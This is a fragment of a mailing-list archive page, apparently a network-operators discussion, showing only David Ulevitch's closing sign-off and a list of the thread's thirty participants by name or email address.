Thanks, David Ulevitch mailto:davidu@everydns.net
participants (30)
-
Bill Larson
-
Brett Frankenberger
-
Bryan Heitman
-
Chris Grout
-
Christopher X. Candreva
-
Daniel Senie
-
David Ulevitch
-
deeann mikula
-
Eric Gauthier
-
Eric Germann
-
Hermann Wecke
-
Iljitsch van Beijnum
-
Jared Mauch
-
Jeff Gehlbach
-
Joe Abley
-
Joseph McDonald
-
k claffy
-
M. David Leonard
-
Mark Radabaugh - Amplex
-
Michael Airhart
-
Nick Thompson
-
Rafi Sadowsky
-
ravi pina
-
Rich Sena
-
sigma@pair.com
-
Tim Winders
-
Ulf Zimmermann
-
up@3.am
-
Valdis.Kletnieks@vt.edu
-
z@s0be.net